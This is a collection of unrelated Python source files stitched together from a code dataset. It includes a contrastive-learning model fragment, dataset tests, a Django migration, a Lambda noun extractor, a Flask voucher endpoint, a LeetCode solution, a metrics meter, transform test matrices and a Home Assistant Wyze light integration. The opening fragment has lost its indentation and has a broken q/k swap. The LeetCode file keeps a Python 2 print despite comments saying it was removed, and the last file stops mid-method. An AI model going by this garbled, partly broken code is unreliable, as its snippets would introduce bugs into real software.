all_ims_qk = torch.cat([im_q[:half_bsz, ...], im_k[half_bsz:, ...]], dim=0)
all_ims_kq = torch.cat([im_k[:half_bsz, ...], im_q[half_bsz:, ...]], dim=0)
im_q = all_ims_qk
im_k = all_ims_kq
# randomly swap q and k to avoid alignment bias
if torch.rand(1).item() < 0.5:
tmp = im_k
im_k = im_q
im_k = tmp
q = self.encoder_q(im_q)[0] # queries: NxC
q = nn.functional.normalize(q, dim=1)
# compute key features
with torch.no_grad(): # no gradient to keys
self._momentum_update_key_encoder() # update the key encoder
# shuffle for making use of BN
if not self.debug:
im_k, idx_unshuffle = self._batch_shuffle_ddp(im_k)
k = self.encoder_k(im_k)[0] # keys: NxC
k = nn.functional.normalize(k, dim=1)
# undo shuffle
if not self.debug:
k = self._batch_unshuffle_ddp(k, idx_unshuffle)
# compute logits
# Einstein sum is more intuitive
# positive logits: Nx1
l_pos = torch.einsum('nc,nc->n', [q, k]).unsqueeze(-1)
# negative logits: NxK
l_neg = torch.einsum('nc,ck->nk', [q, self.queue.clone().detach()])
losses = self.head(l_pos, l_neg)
self._dequeue_and_enqueue(k)
return losses
    def forward_test(self, img, **kwargs):
        """Forward computation during testing (not implemented for this model)."""
        pass
    def forward(self, img=None, img_q=None, img_k=None, mode='train', **kwargs):
        """
        Takes img (concat tensor of both images) or explicitly img_q and img_k.

        Dispatches on `mode` ('train' / 'test' / 'extract').
        NOTE(review): forward_test() accepts (img, **kwargs) so im_q/im_k land
        in kwargs, and self.backbone is called with keyword arguments it may
        not expect -- confirm those call signatures.
        """
        if mode == 'train':
            return self.forward_train(img=img, im_q=img_q, im_k=img_k, **kwargs)
        elif mode == 'test':
            return self.forward_test(img=img, im_q=img_q, im_k=img_k, **kwargs)
        elif mode == 'extract':
            return self.backbone(img=img, im_q=img_q, im_k=img_k)
        else:
            raise Exception("No such mode: {}".format(mode))
# utils
@torch.no_grad()
def concat_all_gather(tensor):
    """Gather *tensor* from every rank and concatenate along dim 0.

    *** Warning ***: torch.distributed.all_gather has no gradient.
    """
    world_size = torch.distributed.get_world_size()
    gathered = [torch.ones_like(tensor) for _ in range(world_size)]
    torch.distributed.all_gather(gathered, tensor, async_op=False)
    return torch.cat(gathered, dim=0)
| StarcoderdataPython |
61238 | # -*- encoding:utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
| StarcoderdataPython |
141077 | from __future__ import absolute_import
import unittest
import os
import torch
from torchvision import transforms
from data import data
from data import dataloaders
class test_data(unittest.TestCase):
    """Tests for the CIFAR / rotated-MNIST dataset wrappers and loaders.

    NOTE(review): requires the dataset files to already exist under ./data
    (CIFAR-10 plus the rotated-MNIST .amat file) -- confirm before running.
    """
    def setUp(self):
        # Shared fixtures: dataset root, dataset name, augmentation pipeline.
        self.path=os.getcwd() + '/data'
        self.name='cifar10'
        self.trans= transforms.Compose([transforms.RandomResizedCrop(32),
                                        transforms.RandomHorizontalFlip(),
                                        transforms.ToTensor()])
    def test_loading_cifar(self):
        # Full CIFAR-10 train split: 50k samples, tensor image and label.
        data_class = data.CIFAR(root=self.path, train=True, trans=self.trans, sample=None, name=self.name)
        self.assertEqual(len(data_class), 50000)
        self.assertTrue(isinstance(data_class[0][0], torch.Tensor))
        self.assertTrue(isinstance(data_class[0][1], torch.Tensor))
    def test_subsampling(self):
        # With a random per-class sample size, no class may exceed that size.
        test_size = torch.randint(0, 50000, (1,))
        data_class = data.CIFAR(root=self.path, train=True, trans=self.trans, sample=test_size, name=self.name)
        for i in range(10):
            index = torch.nonzero((data_class.label[data_class.index] == i)).flatten()
            self.assertLessEqual(index.shape[0], test_size)
    def test_dataloader(self):
        # test loader construction only (no iteration).
        train, test = dataloaders.CIFARX(self.name, self.path)
        self.assertIsNotNone(train)
        self.assertIsNotNone(test)
    def test_loading_rotMNIST(self):
        # NOTE(review): asserts 50000 samples although the filename says
        # "test" split -- confirm the expected size against the dataset.
        datapath = os.getcwd() + '/data/mnist_all_rotation_normalized_float_test.amat'
        data_class = data.ROTMNIST(datapath, trans= transforms.Compose([transforms.ToTensor(),
                                                                        ]))
        self.assertEqual(len(data_class), 50000)
| StarcoderdataPython |
3306184 | from __future__ import absolute_import
from require.require import *
| StarcoderdataPython |
3212587 | <reponame>gitter-badger/LendIt
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-08-13 16:27
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 1.9.2: introduces the `Borrowed` through-model
    # (book + lender + borrower), removes `RequestSent`, and rewires the
    # `Notification` foreign keys (book_id -> book FK with related_names).
    # Generated migrations should not be edited retroactively once applied.
    dependencies = [
        ('website', '0002_remove_lendituser_name'),
    ]
    operations = [
        migrations.CreateModel(
            name='Borrowed',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('book', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='website.UserBook')),
                ('lender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lender', to='website.LenditUser')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='borrower', to='website.LenditUser')),
            ],
        ),
        migrations.RemoveField(
            model_name='requestsent',
            name='user',
        ),
        migrations.RemoveField(
            model_name='notification',
            name='book_id',
        ),
        migrations.AddField(
            model_name='notification',
            name='book',
            field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='website.UserBook'),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='notification',
            name='other_user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='other_user', to='website.LenditUser'),
        ),
        migrations.AlterField(
            model_name='notification',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='me_user', to='website.LenditUser'),
        ),
        migrations.DeleteModel(
            name='RequestSent',
        ),
    ]
| StarcoderdataPython |
1642063 | <reponame>FJOQWIERMDNKFAJ/khaiii
import json
from khaiii import KhaiiiApi
target_tags = ['NNG', 'NNP']
def parse(s):
    """Yield [lexeme, POS-tag] pairs for every morpheme khaiii finds in *s*."""
    api = KhaiiiApi()
    for word in api.analyze(s):
        # Words lacking a `morphs` attribute are silently skipped, as before.
        for morph in getattr(word, 'morphs', ()):
            yield [morph.lex, morph.tag]
def collect(inp):
    """Return the set of noun lexemes (tags in `target_tags`) found in *inp*."""
    return {lex for lex, tag in parse(inp) if tag in target_tags}
def lambda_handler(event, context):
    """AWS Lambda entry point: extract nouns (NNG/NNP) from the request text.

    Expects an API-Gateway proxy event whose JSON body contains a ``text``
    field; responds 200 with ``{"nn": [...]}`` or 400 on any failure.
    """
    # .get() tolerates events without the isBase64Encoded flag.
    if event.get('isBase64Encoded', False):
        import base64
        body = json.loads(base64.b64decode(event['body']).decode())
    else:
        body = json.loads(event['body'])
    try:
        inp = body['text']
        out = collect(inp)  # set[str] of noun lexemes
        return {
            'statusCode': 200,
            'body': json.dumps({'nn': list(out)}),
            'isBase64Encoded': False,
        }
    except Exception:
        # Was a bare `except:` (also swallowed SystemExit/KeyboardInterrupt).
        # BUGFIX: the 400 body must be a JSON *string* for Lambda proxy
        # integration; the original returned a raw dict here.
        return {
            'statusCode': 400,
            'body': json.dumps({'detail': 'bad request'}),
            'isBase64Encoded': False,
        }
| StarcoderdataPython |
1665780 | from flask import Blueprint, jsonify, make_response, request
from flask import current_app
from wlan_api.generate import generate_vouchers
shop = Blueprint('shop', __name__)
# https://pythonise.com/series/learning-flask/working-with-json-in-flask
@shop.route('/', methods=["GET"])
def example():
    # Placeholder root endpoint; mirrors the JSON-only 405 error response.
    return jsonify({"message": "Request body must be JSON"}), 405
@shop.route('/getvoucher', methods=["GET"])
def example1():
    # Placeholder endpoint; same 405 reply, built via make_response.
    return make_response(jsonify({"message": "Request body must be JSON"}), 405)
@shop.route("/json", methods=["POST"])
def example2():
if request.is_json:
req = request.get_json()
response_body = {
"message": "JSON received!",
"sender": req.get("name")
}
res = make_response(jsonify(response_body), 200)
return res
else:
return make_response(jsonify({"message": "Request body must be JSON"}), 405)
@shop.route("/vouchers", methods=["POST"])
def vouchers():
if request.is_json:
voucher_config = current_app.config['VOUCHER']
vouchers = generate_vouchers(10, 100, voucher_config['key'],
voucher_config['alphabet'],
voucher_config['length'])
res = make_response(jsonify(vouchers), 200)
return res
else:
return make_response(jsonify({"message": "Request body must be JSON"}), 405)
| StarcoderdataPython |
3227019 | <gh_stars>0
class Solution:
    # @param s, a string
    # @return an integer
    def numDecodings(self, s):
        """Count decodings of a digit string where '1'->'A' .. '26'->'Z'.

        Rolling three-variable DP over the string; O(n) time, O(1) space.
        """
        # Valid codes as *strings* ("1".."26").
        # BUGFIX: the original built a set of ints, so every membership test
        # on characters/substrings failed and the function returned 0 for
        # all inputs. Also removed a leftover Python-2 debug `print s`.
        codes = {str(i) for i in range(1, 27)}
        if not s or s[0] not in codes:
            return 0
        s = "0" + s  # sentinel so s[i-1:i+1] is well-defined at i == 1
        prev, current, nxt = 1, 1, 0
        for i in range(1, len(s)):
            if s[i] in codes:
                # Digit decodes alone; add the two-digit option when the
                # pair s[i-1]s[i] is also a valid code (10..26).
                nxt = prev + current if s[i-1:i+1] in codes else current
            else:
                # '0' can only be consumed as part of "10" or "20".
                if s[i-1:i+1] in codes:
                    nxt = prev
                else:
                    return 0
            prev, current = current, nxt
        return current
a = Solution()
print a.numDecodings("1") | StarcoderdataPython |
1758269 | import time
from threading import Lock
from .base_metric import BaseMetric
from ..stats.moving_average import ExpWeightedMovingAvg
class Meter(BaseMetric):
    """
    A meter metric which measures mean throughput and one-, five-, and fifteen-minute
    exponentially-weighted moving average throughputs.
    """
    def __init__(self, key, clock=time, tags=None):
        # `clock` only needs a .time() method; injectable for testing.
        super(Meter, self).__init__(key, tags)
        self.lock = Lock()
        self.clock = clock
        self.clear()
    def clear(self):
        """Reset the counter and all EWMAs; restart the mean-rate window."""
        with self.lock:
            self.start_time = self.clock.time()
            self.counter = 0.0
            self.m1rate = ExpWeightedMovingAvg(period=1, clock=self.clock)
            self.m5rate = ExpWeightedMovingAvg(period=5, clock=self.clock)
            self.m15rate = ExpWeightedMovingAvg(period=15, clock=self.clock)
    def get_one_minute_rate(self):
        """One-minute exponentially-weighted moving average rate."""
        return self.m1rate.get_rate()
    def get_five_minute_rate(self):
        """Five-minute exponentially-weighted moving average rate."""
        return self.m5rate.get_rate()
    def get_fifteen_minute_rate(self):
        """Fifteen-minute exponentially-weighted moving average rate."""
        return self.m15rate.get_rate()
    def tick(self):
        # Advance all EWMAs to the current time (decays stale rates).
        # NOTE(review): not lock-protected, unlike mark() -- confirm intended.
        self.m1rate.tick()
        self.m5rate.tick()
        self.m15rate.tick()
    def mark(self, value=1):
        """Record `value` new events (thread-safe)."""
        with self.lock:
            self.counter += value
            self.m1rate.add(value)
            self.m5rate.add(value)
            self.m15rate.add(value)
    def get_count(self):
        """Total events recorded since the last clear()."""
        return self.counter
    def get_mean_rate(self):
        """Mean events per clock unit since the last clear(); 0 when empty."""
        if self.counter == 0:
            return 0
        elapsed = self.clock.time() - self.start_time
        return self.counter / elapsed
    def _convertNsRate(self, ratePerNs):
        # Identity here; presumably a hook for nanosecond-based clocks in
        # subclasses or reporters -- confirm before relying on unit semantics.
        return ratePerNs
| StarcoderdataPython |
145496 | <reponame>gold-standard-phantoms/asldro
""" Test data for test_resampling.py """
import numpy as np
ROT_X_TEST_DATA = (
(
0.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 1.000000, -0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
30.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.866025, -0.500000, 0.000000),
(0.000000, 0.500000, 0.866025, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
45.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.707107, -0.707107, 0.000000),
(0.000000, 0.707107, 0.707107, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
60.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.500000, -0.866025, 0.000000),
(0.000000, 0.866025, 0.500000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
90.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, -1.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
-90.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, -1.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
180.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, -1.000000, -0.000000, 0.000000),
(0.000000, 0.000000, -1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
ROT_Y_TEST_DATA = (
(
0.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
30.00,
np.array(
(
(0.866025, 0.000000, 0.500000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.500000, 0.000000, 0.866025, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
45.00,
np.array(
(
(0.707107, 0.000000, 0.707107, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.707107, 0.000000, 0.707107, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
60.00,
np.array(
(
(0.500000, 0.000000, 0.866025, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.866025, 0.000000, 0.500000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
90.00,
np.array(
(
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
-90.00,
np.array(
(
(0.000000, 0.000000, -1.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
180.00,
np.array(
(
(-1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.000000, 0.000000, -1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
ROT_Z_TEST_DATA = (
(
0.00,
np.array(
(
(1.000000, -0.000000, 0.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
30.00,
np.array(
(
(0.866025, -0.500000, 0.000000, 0.000000),
(0.500000, 0.866025, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
45.00,
np.array(
(
(0.707107, -0.707107, 0.000000, 0.000000),
(0.707107, 0.707107, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
60.00,
np.array(
(
(0.500000, -0.866025, 0.000000, 0.000000),
(0.866025, 0.500000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
90.00,
np.array(
(
(0.000000, -1.000000, 0.000000, 0.000000),
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
-90.00,
np.array(
(
(0.000000, 1.000000, 0.000000, 0.000000),
(-1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
180.00,
np.array(
(
(-1.000000, -0.000000, 0.000000, 0.000000),
(0.000000, -1.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
TRANSLATE_TEST_DATA = (
(
(-14.223759, 4.881939, -1.773752,),
np.array(
(
(1.000000, 0.000000, 0.000000, -14.223759),
(0.000000, 1.000000, 0.000000, 4.881939),
(0.000000, 0.000000, 1.000000, -1.773752),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-1.960535, 14.193102, 2.915844,),
np.array(
(
(1.000000, 0.000000, 0.000000, -1.960535),
(0.000000, 1.000000, 0.000000, 14.193102),
(0.000000, 0.000000, 1.000000, 2.915844),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(1.978111, 15.876991, -8.044660,),
np.array(
(
(1.000000, 0.000000, 0.000000, 1.978111),
(0.000000, 1.000000, 0.000000, 15.876991),
(0.000000, 0.000000, 1.000000, -8.044660),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(6.966244, 8.350882, -2.437151,),
np.array(
(
(1.000000, 0.000000, 0.000000, 6.966244),
(0.000000, 1.000000, 0.000000, 8.350882),
(0.000000, 0.000000, 1.000000, -2.437151),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(2.156701, -11.658439, -11.479528,),
np.array(
(
(1.000000, 0.000000, 0.000000, 2.156701),
(0.000000, 1.000000, 0.000000, -11.658439),
(0.000000, 0.000000, 1.000000, -11.479528),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(1.048747, 7.222540, 25.854913,),
np.array(
(
(1.000000, 0.000000, 0.000000, 1.048747),
(0.000000, 1.000000, 0.000000, 7.222540),
(0.000000, 0.000000, 1.000000, 25.854913),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-6.668907, 1.873310, -0.824944,),
np.array(
(
(1.000000, 0.000000, 0.000000, -6.668907),
(0.000000, 1.000000, 0.000000, 1.873310),
(0.000000, 0.000000, 1.000000, -0.824944),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
SCALE_TEST_DATA = (
(
(-1.976982, -12.078455, 29.080080,),
np.array(
(
(-1.976982, 0.000000, 0.000000, 0.000000),
(0.000000, -12.078455, 0.000000, 0.000000),
(0.000000, 0.000000, 29.080080, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(8.252189, 13.789720, -10.581803,),
np.array(
(
(8.252189, 0.000000, 0.000000, 0.000000),
(0.000000, 13.789720, 0.000000, 0.000000),
(0.000000, 0.000000, -10.581803, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-4.686156, -2.724694, 10.984246,),
np.array(
(
(-4.686156, 0.000000, 0.000000, 0.000000),
(0.000000, -2.724694, 0.000000, 0.000000),
(0.000000, 0.000000, 10.984246, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-2.778719, 7.015415, -20.518163,),
np.array(
(
(-2.778719, 0.000000, 0.000000, 0.000000),
(0.000000, 7.015415, 0.000000, 0.000000),
(0.000000, 0.000000, -20.518163, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-3.538500, -8.235865, -15.770570,),
np.array(
(
(-3.538500, 0.000000, 0.000000, 0.000000),
(0.000000, -8.235865, 0.000000, 0.000000),
(0.000000, 0.000000, -15.770570, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(5.079747, 2.819841, 0.334799,),
np.array(
(
(5.079747, 0.000000, 0.000000, 0.000000),
(0.000000, 2.819841, 0.000000, 0.000000),
(0.000000, 0.000000, 0.334799, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-13.336779, 11.274923, 3.501794,),
np.array(
(
(-13.336779, 0.000000, 0.000000, 0.000000),
(0.000000, 11.274923, 0.000000, 0.000000),
(0.000000, 0.000000, 3.501794, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
| StarcoderdataPython |
1752625 | <reponame>drunkwater/leetcode
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#796. Rotate String
#We are given two strings, A and B.
#A shift on A consists of taking string A and moving the leftmost character to the rightmost position. For example, if A = 'abcde', then it will be 'bcdea' after one shift on A. Return True if and only if A can become B after some number of shifts on A.
#Example 1:
#Input: A = 'abcde', B = 'cdeab'
#Output: true
#Example 2:
#Input: A = 'abcde', B = 'abced'
#Output: false
#Note:
#A and B will have length at most 100.
#class Solution:
# def rotateString(self, A, B):
# """
# :type A: str
# :type B: str
# :rtype: bool
# """
# Time Is Money | StarcoderdataPython |
1626942 | <gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, division
import os
import shutil
import tempfile
import logging
import moto
from mock import patch, Mock
from unittest2 import TestCase
import ultimate_source_of_accounts.cli as cli
class UploadTest(TestCase):
    """Test the upload() function that is used for --import=...."""
    def setUp(self):
        # Build a temp account directory with one YAML file, plus the CLI
        # argument dict (docopt-style keys) that points at it.
        self.tempdir = tempfile.mkdtemp()
        self.arguments = {'<destination-bucket-name>': "bucketname42",
                          '--allowed-ip': ["123", "345"],
                          '--import': self.tempdir,
                          '--check-billing': None}
        with open(os.path.join(self.tempdir, "foo.yaml"), "w") as config:
            # NOTE(review): the fixture email ends in '.invalid' while the
            # expectations below use a plain '<EMAIL>' placeholder -- both
            # look scrubbed; confirm against the original repository.
            config.write("my_account:\n id: 42\n email: <EMAIL>.invalid\n owner: me")
    def tearDown(self):
        shutil.rmtree(self.tempdir)
    # Patch decorators are applied bottom-up, so mock arguments arrive in
    # reverse decorator order in each test method below.
    @patch("ultimate_source_of_accounts.cli.get_converted_aws_accounts")
    @patch("ultimate_source_of_accounts.cli.S3Uploader")
    def test_upload_loads_data_from_specified_directory(self, mock_exporter_class, mock_converter):
        mock_converter.return_value = {"foo": "bar"}
        cli._main(self.arguments)
        # The converter must receive the parsed YAML from the temp directory.
        mock_converter.assert_called_once_with(
            {'my_account': {'id': '42', 'email': '<EMAIL>', 'owner': 'me'}})
    @patch("ultimate_source_of_accounts.cli.get_converted_aws_accounts")
    @patch("ultimate_source_of_accounts.cli.S3Uploader")
    def test_upload_calls_all_upload_tasks(self, mock_exporter_class, mock_converter):
        """Mock away S3 Uploader, see if all necessary methods were called"""
        mock_converter.return_value = {"foo": "bar"}
        mock_exporter_instance = Mock()
        mock_exporter_class.return_value = mock_exporter_instance
        cli._main(self.arguments)
        mock_exporter_class.assert_called_once_with(
            "bucketname42",
            allowed_ips=["123", "345"],
            allowed_aws_account_ids=['42'])
        mock_exporter_instance.setup_infrastructure.assert_called_once_with()
        mock_exporter_instance.upload_to_S3.assert_called_once_with({'foo': 'bar'})
    @patch("ultimate_source_of_accounts.cli.get_converted_aws_accounts")
    @patch("ultimate_source_of_accounts.cli.S3Uploader.upload_to_S3")
    @patch("ultimate_source_of_accounts.cli.S3Uploader.setup_infrastructure")
    @moto.mock_s3
    def test_upload_uses_S3Uploader_correctly(self, _, mock_upload, mock_converter):
        """Check if the 'necessary methods' used above actually exist on S3Uploader"""
        upload_data = {"foo": "bar"}
        mock_converter.return_value = upload_data
        cli._main(self.arguments)
        mock_upload.assert_called_once_with(upload_data)
    @patch("ultimate_source_of_accounts.cli.read_directory")
    def test_main_logs_invalid_data(self, read_directory_mock):
        # A failing read_directory must both raise and log dir + message.
        message = "This must be logged"
        read_directory_mock.side_effect = Exception(message)
        with self.assertLogs(level=logging.WARN) as cm:
            self.assertRaises(Exception, cli._main, self.arguments)
        logged_output = "\n".join(cm.output)
        self.assertRegex(logged_output, ".*" + self.tempdir + ".*" + message + ".*")
class CheckTest(TestCase):
    """Test the check_billing() function that is used for --check_billing"""
    def test_check_billing_not_yet_implemented(self):
        # While unimplemented, check_billing() is expected to exit the
        # process (SystemExit) instead of returning.
        self.assertRaises(SystemExit, cli.check_billing, "foo", "bar")
| StarcoderdataPython |
153735 | #!/usr/bin/python3
"""Platform for light integration."""
import logging
# Import the device class from the component that you want to support
from datetime import timedelta
from typing import Any, List
import homeassistant.util.color as color_util
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_HS_COLOR,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR_TEMP,
SUPPORT_COLOR,
LightEntity
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ATTRIBUTION
from homeassistant.core import HomeAssistant
from wyzeapy.base_client import AccessTokenError, Device, DeviceTypes
from wyzeapy.client import Client
from wyzeapy.types import PropertyIDs
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Data provided by Wyze"
SCAN_INTERVAL = timedelta(seconds=30)
async def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities):
    """Set up Wyze light entities for a config entry."""
    _LOGGER.debug("""Creating new WyzeApi light component""")
    client: Client = hass.data[DOMAIN][config_entry.entry_id]
    def get_bulbs() -> List[Device]:
        # Runs in the executor (blocking I/O); re-authenticates once on an
        # expired access token and retries.
        try:
            return client.get_bulbs()
        except AccessTokenError as e:
            _LOGGER.warning(e)
            client.reauthenticate()
            return client.get_bulbs()
    # Fetch bulbs off the event loop, then register entities (update=True
    # triggers an initial state refresh).
    lights = [WyzeLight(client, light) for light in await hass.async_add_executor_job(get_bulbs)]
    async_add_entities(lights, True)
class WyzeLight(LightEntity):
    """Representation of a Wyze Bulb."""
    # Cached device state, refreshed by update(); these attributes are unset
    # until the first poll or command completes.
    _brightness: int   # Wyze scale 1-100
    _color_temp: int   # Kelvin, 2700-6500
    _color: str        # hex RGB string; only set for mesh (color) bulbs
    _on: bool
    _available: bool
    _just_updated = False  # True right after a command; skips the next poll
    def __init__(self, client: Client, device: Device):
        """Initialize a Wyze Bulb."""
        self._device = device
        self._device_type = DeviceTypes(self._device.product_type)
        if self._device_type not in [
            DeviceTypes.LIGHT,
            DeviceTypes.MESH_LIGHT
        ]:
            raise AttributeError("Device type not supported")
        self._client = client
    @property
    def device_info(self):
        # Device-registry metadata linking this entity to the physical bulb.
        return {
            "identifiers": {
                (DOMAIN, self._device.mac)
            },
            "name": self.name,
            "manufacturer": "WyzeLabs",
            "model": self._device.product_model
        }
    @property
    def should_poll(self) -> bool:
        # State is fetched by polling update() every SCAN_INTERVAL.
        return True
    @staticmethod
    def translate(value, input_min, input_max, output_min, output_max):
        """Linearly rescale *value* from [input_min, input_max] onto
        [output_min, output_max]; returns None when value is None."""
        if value is None:
            return None
        # Figure out how 'wide' each range is
        left_span = input_max - input_min
        right_span = output_max - output_min
        # Convert the left range into a 0-1 range (float)
        value_scaled = float(value - input_min) / float(left_span)
        # Convert the 0-1 range into a value in the right range.
        return output_min + (value_scaled * right_span)
    def turn_on(self, **kwargs: Any) -> None:
        """Turn the bulb on, optionally applying brightness / temp / color."""
        pids = []
        if kwargs.get(ATTR_BRIGHTNESS) is not None:
            _LOGGER.debug("Setting brightness")
            # HA brightness (1-255) -> Wyze brightness (1-100).
            self._brightness = self.translate(kwargs.get(ATTR_BRIGHTNESS), 1, 255, 1, 100)
            pids.append(self._client.create_pid_pair(PropertyIDs.BRIGHTNESS, str(int(self._brightness))))
        if kwargs.get(ATTR_COLOR_TEMP) is not None:
            _LOGGER.debug("Setting color temp")
            # HA mireds (500..140) -> Kelvin (2700..6500).
            self._color_temp = self.translate(kwargs.get(ATTR_COLOR_TEMP), 500, 140, 2700, 6500)
            pids.append(self._client.create_pid_pair(PropertyIDs.COLOR_TEMP, str(int(self._color_temp))))
        if self._device_type is DeviceTypes.MESH_LIGHT and kwargs.get(ATTR_HS_COLOR) is not None:
            _LOGGER.debug("Setting color")
            # HS -> RGB hex string; only mesh bulbs support color.
            self._color = color_util.color_rgb_to_hex(*color_util.color_hs_to_RGB(*kwargs.get(ATTR_HS_COLOR)))
            pids.append(self._client.create_pid_pair(PropertyIDs.COLOR, self._color))
        _LOGGER.debug("Turning on light")
        # Retry once after re-authenticating on an expired access token.
        try:
            self._client.turn_on(self._device, pids)
        except AccessTokenError:
            self._client.reauthenticate()
            self._client.turn_on(self._device, pids)
        self._on = True
        self._just_updated = True
    def turn_off(self, **kwargs: Any) -> None:
        """Turn the bulb off (retries once on an expired access token)."""
        try:
            self._client.turn_off(self._device)
        except AccessTokenError:
            self._client.reauthenticate()
            self._client.turn_off(self._device)
        self._on = False
        self._just_updated = True
    @property
    def name(self):
        """Return the display name of this light."""
        return self._device.nickname
    @property
    def unique_id(self):
        # MAC address is unique per bulb.
        return self._device.mac
    @property
    def available(self):
        """Return the connection status of this light"""
        return self._available
    @property
    def hs_color(self):
        # NOTE(review): self._color is only populated for MESH_LIGHT bulbs;
        # HA should only query this when SUPPORT_COLOR is advertised.
        return color_util.color_RGB_to_hs(*color_util.rgb_hex_to_rgb_list(self._color))
    @property
    def device_state_attributes(self):
        """Return device attributes of the entity."""
        return {
            ATTR_ATTRIBUTION: ATTRIBUTION,
            "state": self.is_on,
            "available": self.available,
            "device model": self._device.product_model,
            "mac": self.unique_id
        }
    @property
    def brightness(self):
        """Return the brightness of the light.

        This method is optional. Removing it indicates to Home Assistant
        that brightness is not supported for this light.
        """
        # Wyze (1-100) -> HA (1-255).
